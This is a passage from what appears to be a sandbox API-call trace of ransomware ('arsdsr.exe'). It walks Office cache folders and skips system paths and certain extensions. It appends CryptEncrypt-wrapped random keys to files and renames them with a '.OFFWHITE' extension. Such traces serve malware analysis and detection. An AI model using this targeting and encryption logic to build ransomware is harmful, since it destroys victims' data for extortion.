Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" [0082.608] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.608] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.608] PathFindExtensionW (pszPath="PptLR.cab") returned=".cab" [0082.608] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0082.608] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0082.608] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0082.608] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0082.608] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0082.608] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\" [0082.608] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" [0082.608] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.608] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.608] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0082.609] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0082.609] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0082.609] GetProcessHeap () returned 0x500000 [0082.609] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bb30 [0082.609] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0082.610] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1886) returned 1 [0082.610] GetProcessHeap () returned 0x500000 [0082.610] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0082.610] GetProcessHeap () returned 0x500000 [0082.610] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0082.610] GetProcessHeap () returned 0x500000 [0082.610] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0082.610] GetProcessHeap () returned 0x500000 [0082.610] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0082.610] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.610] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.610] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0082.610] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.610] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.610] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0082.610] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.610] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.611] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0082.611] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.611] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.611] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0082.611] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x75e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.611] SetLastError (dwErrCode=0x0) [0082.611] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.617] GetLastError () returned 0x0 [0082.617] GetLastError () returned 0x0 [0082.617] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x85e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.617] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.618] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x95e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.618] WriteFile (in: hFile=0x21c, lpBuffer=0x52bb30*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x52bb30*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0082.618] GetProcessHeap () returned 0x500000 [0082.618] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x75e) returned 0x546980 [0082.618] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.618] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x75e, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x75e, lpOverlapped=0x0) returned 1 [0082.618] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.618] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x75e, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x75e, lpOverlapped=0x0) returned 1 [0082.618] GetProcessHeap () returned 0x500000 [0082.618] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0082.618] CloseHandle (hObject=0x21c) returned 1 [0082.620] GetProcessHeap () returned 0x500000 [0082.620] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0082.620] GetProcessHeap () returned 0x500000 [0082.620] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0082.620] GetProcessHeap () returned 0x500000 [0082.620] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0082.621] GetProcessHeap () returned 0x500000 [0082.621] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0082.621] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" [0082.621] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0082.621] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0082.621] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xecdfa490, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0082.621] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0082.622] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-0019-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9877A~1")) returned 1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0082.622] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0082.622] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0082.667] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-0019-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C" [0082.667] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" [0082.667] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" [0082.667] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*" [0082.668] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0082.720] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.720] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc3e6570, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc8a9170, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0082.720] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.720] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.720] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc40b730, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x265c00, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PublisherMUI.msi", cAlternateFileName="PUBLIS~1.MSI")) returned 1 [0082.720] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2=".") returned 1 [0082.720] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="..") returned 1 [0082.720] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="...") returned 1 [0082.720] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="windows") returned -1 [0082.720] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="$recycle.bin") returned 1 [0082.720] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="rsa") returned -1 [0082.721] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="ntuser.dat") returned 1 [0082.721] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="programdata") returned 1 [0082.721] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="appdata") returned 1 [0082.721] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="program files") returned 1 [0082.721] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="program files (x86)") returned 1 [0082.721] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" [0082.721] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="PublisherMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" [0082.721] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.721] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.721] PathFindExtensionW (pszPath="PublisherMUI.msi") returned=".msi" [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0082.721] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0082.721] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5aa, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="PublisherMUI.xml", cAlternateFileName="PUBLIS~1.XML")) returned 1 [0082.721] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2=".") returned 1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="..") returned 1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="...") returned 1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="windows") returned -1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="$recycle.bin") returned 1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="rsa") returned -1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="ntuser.dat") returned 1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="programdata") returned 1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="appdata") returned 1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="program files") returned 1 [0082.722] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="program files (x86)") returned 1 [0082.722] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\" [0082.722] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\", lpString2="PublisherMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" [0082.722] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.722] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.722] PathFindExtensionW (pszPath="PublisherMUI.xml") returned=".xml" [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0082.722] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0082.723] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0082.723] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0082.723] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0082.723] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0082.723] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0082.723] GetProcessHeap () returned 0x500000 [0082.723] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bb10 [0082.723] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0082.724] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1450) returned 1 [0082.724] GetProcessHeap () returned 0x500000 [0082.724] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0082.724] GetProcessHeap () returned 0x500000 [0082.724] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0082.724] GetProcessHeap () returned 0x500000 [0082.724] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0082.724] GetProcessHeap () returned 0x500000 [0082.724] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0082.724] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.724] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.724] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0082.724] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.724] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.725] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0082.725] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.725] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.725] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0082.725] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.725] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.725] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0082.725] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.725] SetLastError (dwErrCode=0x0) [0082.725] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.751] GetLastError () returned 0x0 [0082.751] GetLastError () returned 0x0 [0082.751] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.751] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0082.751] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7aa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.751] WriteFile (in: hFile=0x21c, lpBuffer=0x52bb10*, 